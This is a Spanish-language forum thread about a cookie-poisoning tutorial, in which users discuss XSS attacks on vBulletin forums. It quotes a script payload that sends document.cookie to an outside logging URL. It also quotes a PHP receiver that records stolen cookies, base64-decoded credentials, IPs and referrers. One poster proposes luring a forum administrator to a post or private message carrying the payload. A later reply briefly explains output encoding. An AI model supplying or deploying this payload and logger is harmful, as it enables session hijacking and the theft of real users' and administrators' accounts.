Tutorial Cookie Poisoning

Iniciado por SkapperMX, 21 Mayo 2007, 02:27 AM

0 Miembros y 1 Visitante están viendo este tema.

yeikos

Cita de: raka en 28 Mayo 2007, 16:47 PM
Me he podido dar cuenta k en muchos foros vBulletin la opcion de HTML esta on,esto supongo k hace k puedas hacer XSS, no?? posteando un tema y atrayendo al admin del foro hasta el o sino tambien puedes escribirle un privado si esta activado el HTML y cuadno lo lea...listo ;) (no se si esta ultima funcione)
Saludos

Cuando esta HTML activado muchas etiquetas, como <script>, quedan inutilizadas para evitar el mal uso de estas...


rakax

En todos los vBulletin k he entrado las etiquetas <script> funcionan bien ya k me he robado mi cookie :D
Saludos
Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc

yeikos

Cita de: raka en 28 Mayo 2007, 22:36 PM
En todos los vBulletin k he entrado las etiquetas <script> funcionan bien ya k me he robado mi cookie :D
Saludos

Quizás en el foro vBulleting donde estuve realizando las pruebas había instalado algún addon para evitar el uso de estas etiquetas...

X_-:XploitX:-_X

 interesante ... muy buen trabajo
si Windows fuera perfecto no existira Linux para serlo

Einsamkeit

Recuerdas la vulnerabilidad XSS??? de ese ataque muy conocido podemos hacer un script robador de cookie bueno veamos

el script lo cual es el siguiente codigo

Código:

<script>self.location.href='http://misitio.com/log.php?c='+escape(document.cookie);</script>

disculpa pero en donde escribes el script?   ( soy novato, pero me intereso este truco)   y que es PHP?
"siehst du mich im licht"

yeikos

Busca en Google información relacionada con HTML, javascript y PHP.

Grave

Alquien podras explicar detenidamente este codigo se entiende un poco a simple vista pero algunas cosas no las entiendo...

Citar<?php
$archivo = fopen('log2.htm','a');//Aqui podemos cambiar el nombre del archivo a crear
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>

IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>
"y el conocimiento os hara libres"

Module Console1
   Console.Write("Hello Word")
   Console.ReadLine()
End Module
http://aion.cr0n0triger.operaunite.com/

yeikos

Cita de: Grave en 19 Julio 2007, 20:44 PM
Alquien podras explicar detenidamente este codigo se entiende un poco a simple vista pero algunas cosas no las entiendo...

http://www.google.es/search?hl=es&q=fopen+php&btnG=Buscar&meta=lr%3Dlang_es

Dark_Knight

hola

tengoun problema...

cuando coloco <script>alert(5);</script>

no me aparece el mensaje... sino que me aparece el post con el codigo escrito

en donde se debe colocar el codigo... y/o que se tiene que hacer para que aparezca el mensaje...

espero su respuesta

gracias  ;D
El hombre no puede crear nada sin antes dar algo a cambio... para crear... algo del mismo valor debe perderse.... esa es la ley de la equivalencia de intercambio... y el que desafie esa ley se convertira en un desafio de las creencias del ser humano y de la existencia de dios....

yeikos

Eso es por que la variable filtra los caracteres especiales, como pueden ser > o <, mostrado como resultado en tu caso &lt;script&gt;alert(5);&lt;/script&gt;.

Examina el código fuente de la página web en busca del código que introdujiste...